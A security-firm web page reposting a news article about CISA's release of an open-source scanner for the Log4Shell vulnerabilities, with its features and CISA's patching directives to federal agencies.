fbpx
Frame-14

Privacy Ninja

        • DATA PROTECTION

        • CYBERSECURITY

        • Penetration Testing

          Secure your network against various threat points. VA starts at only S$1,000, while VAPT starts at S$4,000. With Price Beat Guarantee!

        • API Penetration Testing
        • Enhance your digital security posture with our approach that identifies and addresses vulnerabilities within your API framework, ensuring robust protection against cyber threats targeting your digital interfaces.

        • On-Prem & Cloud Network Penetration Testing
        • Boost your network’s resilience with our assessment that uncovers security gaps, so you can strengthen your defences against sophisticated cyber threats targeting your network

        • Web Penetration Testing
        • Fortify your web presence with our specialised web app penetration testing service, designed to uncover and address vulnerabilities, ensuring your website stands resilient against online threats

        • Mobile Penetration Testing
        • Strengthen your mobile ecosystem’s resilience with our in-depth penetration testing service. From applications to underlying systems, we meticulously probe for vulnerabilities

        • Cyber Hygiene Training
        • Empower your team with essential cybersecurity knowledge, covering the latest vulnerabilities, best practices, and proactive defence strategies

        • Thick Client Penetration Testing
        • Elevate your application’s security with our thorough thick client penetration testing service. From standalone desktop applications to complex client-server systems, we meticulously probe for vulnerabilities to fortify your software against potential cyber threats.

        • Source Code Review
        • Ensure the integrity and security of your codebase with our comprehensive service, meticulously analysing code quality, identifying vulnerabilities, and optimising performance for various types of applications, scripts, plugins, and more

        • Email Spoofing Prevention
        • Check if your organisation’s email is vulnerable to hackers and put a stop to it. Receive your free test today!

        • Email Phishing Excercise
        • Strengthen your defense against email threats via simulated attacks that test and educate your team on spotting malicious emails, reducing breach risks and boosting security.

        • Cyber Essentials Bundle
        • Equip your organisation with essential cyber protection through our packages, featuring quarterly breached accounts monitoring, email phishing campaigns, cyber hygiene training, and more. LAUNCHING SOON.

CISA Releases Apache Log4j Scanner to Find Vulnerable Apps

CISA Releases Apache Log4j Scanner to Find Vulnerable Apps

The Cybersecurity and Infrastructure Security Agency (CISA) has announced the release of a scanner for identifying web services impacted by two Apache Log4j remote code execution vulnerabilities, tracked as CVE-2021-44228 and CVE-2021-45046.

“log4j-scanner is a project derived from other members of the open-source community by CISA’s Rapid Action Force team to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities,” the cybersecurity agency explains.

Also Read: PDPA Compliance for HR Managers in Singapore: A Must

This scanning solution builds upon similar tools, including an automated scanning framework for the CVE-2021-44228 bug (dubbed& Log4Shell)& developed by cybersecurity company FullHunt.

The tool enables security teams to scan network hosts for Log4j RCE exposure and spot web application firewall (WAF) bypasses that can allow threat actors to gain code execution within the organization’s environment.

CISA highlights the following features on log4j-scanner’s project page:

  • Support for lists of URLs.
  • Fuzzing for more than 60 HTTP request headers (not only 3-4 headers as previously seen tools).
  • Fuzzing for HTTP POST Data parameters.
  • Fuzzing for JSON data parameters.
  • Supports DNS callback for vulnerability discovery and validation.
  • WAF Bypass payloads.

CISA’s Log4Shell response

This is just the latest step taken by CISA to help government and private organizations respond to ongoing attacks abusing these critical security flaws in Apache’s Log4j logging library.

The agency was also behind a joint advisory issued today by cybersecurity agencies worldwide and US federal agencies with mitigation guidance on addressing the CVE-2021-44228, CVE-2021-45046, and CVE-2021-45105 Log4j vulnerabilities.

CISA’s also spearheading a push for urgently patching devices vulnerable to Log4Shell attacks to block threat actors’ attempts to exploit Log4Shell vulnerable systems and infect them with malware.

Also Read: 5 Workplace Tips: Protecting Information on Mobile Devices

On Friday, CISA ordered Federal Civilian Executive Branch agencies to patch their systems against Log4Shell until December 23. The cybersecurity agency also recently added the flaw to the Known Exploited Vulnerabilities Catalog, thus also requiring expedited action from federal agencies to mitigate this critical flaw until December 24.

As BleepingComputer reported, Log4Shell attacks have been orchestrated by financially motivated attackers deploying Monero miners, ransomware gangs [12], and even state-backed hackers.

We also have articles with more information on the Log4Shell vulnerability, a comprehensive list of vendor advisories and vulnerable products, and why you must upgrade to Log4j2.17.0 as soon as possible.

0 Comments

KEEP IN TOUCH

Subscribe to our mailing list to get free tips on Data Protection and Data Privacy updates weekly!

Personal Data Protection

REPORTING DATA BREACH TO PDPC?

We have assisted numerous companies to prepare proper and accurate reports to PDPC to minimise financial penalties.
×

Hello!

Click one of our contacts below to chat on WhatsApp

× Chat with us